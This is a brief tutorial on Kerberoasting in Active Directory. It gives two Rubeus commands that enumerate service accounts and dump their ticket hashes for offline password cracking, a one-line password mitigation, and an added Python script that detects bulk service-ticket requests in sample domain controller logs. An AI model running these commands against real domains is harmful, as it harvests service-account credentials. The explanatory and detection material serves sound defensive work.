
Kerberoasting 101

Extracting Service Account Credentials via SPN tickets.

Overview

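Kerberoasting is a post-exploitation technique in which an attacker requests a Kerberos service ticket (TGS) for any service principal name (SPN) in the domain. The weakness is that any authenticated user can request these tickets, and part of each ticket is encrypted with a key derived from the service account's password, so the ticket can be taken offline and the password guessed against it.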

Attack Execution

1. Enumerate SPNs:

```powershell
Rubeus.exe kerberoast /stats
```

2. Request & Roast:

```powershell
Rubeus.exe kerberoast /format:hashcat /outfile:hashes.txt
```

Mitigation

Ensure service accounts have complex, long passwords (25+ characters) to make offline cracking infeasible.
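
Because any authenticated user can request these tickets, the requests themselves are what a defender can watch for. The following is an added example, not part of the original article: it flags accounts that request service tickets for many distinct user-account services in a short burst, using constructed records modelled on the fields of domain controller Event ID 4769. The function name, the 5-minute window and the threshold of 4 are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # legacy etype; AES tickets are 0x11 / 0x12

# Constructed sample: (time, requesting account, ServiceName, TicketEncryptionType)
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", "alice@CORP.EXAMPLE", "svc-sql", "0x17"),
    ("2024-05-01T10:00:02", "alice@CORP.EXAMPLE", "svc-web", "0x17"),
    ("2024-05-01T10:00:02", "alice@CORP.EXAMPLE", "svc-backup", "0x17"),
    ("2024-05-01T10:00:03", "alice@CORP.EXAMPLE", "svc-report", "0x17"),
    ("2024-05-01T10:00:04", "alice@CORP.EXAMPLE", "krbtgt", "0x12"),
    ("2024-05-01T09:00:00", "bob@CORP.EXAMPLE", "svc-sql", "0x12"),
    ("2024-05-01T09:00:05", "bob@CORP.EXAMPLE", "FILE01$", "0x12"),
    ("2024-05-01T08:00:00", "carol@CORP.EXAMPLE", "svc-sql", "0x12"),
    ("2024-05-01T11:00:00", "carol@CORP.EXAMPLE", "svc-web", "0x12"),
    ("2024-05-01T14:00:00", "carol@CORP.EXAMPLE", "svc-backup", "0x12"),
    ("2024-05-01T16:00:00", "carol@CORP.EXAMPLE", "svc-report", "0x12"),
]

def find_bulk_requesters(events, window=timedelta(minutes=5), threshold=4):
    """Flag accounts requesting tickets for >= threshold distinct
    user-account services inside one sliding time window."""
    per_user = defaultdict(list)
    for ts, user, service, etype in events:
        service = service.lower()
        # krbtgt and machine accounts (name ends in $) have random keys,
        # so tickets for them are not useful for offline cracking.
        if service == "krbtgt" or service.endswith("$"):
            continue
        per_user[user.lower()].append(
            (datetime.fromisoformat(ts), service, int(etype, 16)))
    flagged = {}
    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1  # slide the window forward
            burst = reqs[start:end + 1]
            services = {s for _, s, _ in burst}
            if len(services) >= threshold:
                rc4 = sum(1 for _, _, e in burst if e == RC4_HMAC)
                flagged[user] = {"services": sorted(services), "rc4": rc4}
    return flagged

if __name__ == "__main__":
    for user, hit in find_bulk_requesters(SAMPLE_EVENTS).items():
        print(user, hit)
```

The `rc4` count is reported rather than used as a filter, since a burst of AES-encrypted requests for distinct services is still worth reviewing.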